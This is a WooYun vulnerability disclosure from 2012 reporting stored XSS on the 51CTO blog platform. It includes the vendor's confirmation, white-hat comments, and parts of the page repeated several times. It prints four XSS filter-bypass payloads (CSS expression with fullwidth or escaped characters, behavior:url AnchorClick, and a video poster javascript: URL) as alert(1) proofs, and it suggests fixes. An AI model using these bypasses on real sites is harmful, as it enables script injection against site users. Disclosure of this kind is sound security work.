51CTO博客多处存储XSS，各种bypass技巧 | wooyun-2012-016072| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-016072

漏洞标题：51CTO博客多处存储XSS，各种bypass技巧

漏洞作者： _Evil

提交时间：2012-12-17 19:23

修复时间：2013-01-31 19:23

公开时间：2013-01-31 19:23

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-12-17：细节已通知厂商并且等待厂商处理中
2012-12-19：厂商已经确认，细节仅向厂商公开
2012-12-29：细节向核心白帽子及相关领域专家公开
2013-01-08：细节向普通白帽子公开
2013-01-18：细节向实习白帽子公开
2013-01-31：细节向公众公开

简要描述：

娱乐就来看看。

详细说明：

1、只针对IE6有效的xss，把style里面的expression换成全角字符。

<div style="x:ｅｘｐｒｅｓｓｉｏｎ(alert(1))">IE6</div>

2、IE6-IE8，IE9的兼容模式有效的xss，插入如下的代码，当鼠标点击test即触发xss。

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">test</a>

3，只有Opera高版本才会触发

<video body="" poster="javascript:alert(1)//" tabindex="0">
</video>

插入代码.
4，style跨

<img src="../attachment/201212/184326416.jpg" alt="" style="xss:expre\ssion(alert(1))" border="0" />

漏洞证明：

http://3407504.blog.51cto.com/3397504/1059235

http://3407504.blog.51cto.com/3397504/1090792

修复方案：

1，转换字符编码.
2，behavior限制? 还是在代码后面加个_blank

版权声明：转载请注明来源 _Evil@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2012-12-19 18:27

厂商回复：

漏洞己确认，现在己在修复中，万分感谢。

漏洞评价：

2012-12-17 22:41 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

@xsser 5分 = =
2012-12-17 22:44 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@_Evil 51cto 忍了吧
2012-12-17 22:51 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

@xsser 下次找注入,越权,发绕过他们WAF的baypass. = =我只是学别人连载好看点而已哈哈~~~~
2012-12-19 20:30 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

@xsser 为什么他发的XSS就可以
2012-12-19 20:39 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@数据流他发了好几个个我们整理成了一个
2012-12-19 23:14 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

@数据流 @xsser 我关键是分享绕过富文本的bypass 并不是刷分 - -
2013-01-04 15:05 | gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@_Evil 因为对方程序员欠缺这方面的考虑，自然有其1，就会有其2了。分开来发，意义不大。
2013-01-04 17:41 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

@gainover 受教育。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-016072

漏洞标题：51CTO博客多处存储XSS，各种bypass技巧

相关厂商：51CTO技术网站

漏洞作者： _Evil

提交时间：2012-12-17 19:23

修复时间：2013-01-31 19:23

公开时间：2013-01-31 19:23

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 _Evil@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-016072

漏洞标题：51CTO博客多处存储XSS，各种bypass技巧

相关厂商：51CTO技术网站

漏洞作者： _Evil

提交时间：2012-12-17 19:23

修复时间：2013-01-31 19:23

公开时间：2013-01-31 19:23

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-016072"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 _Evil@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：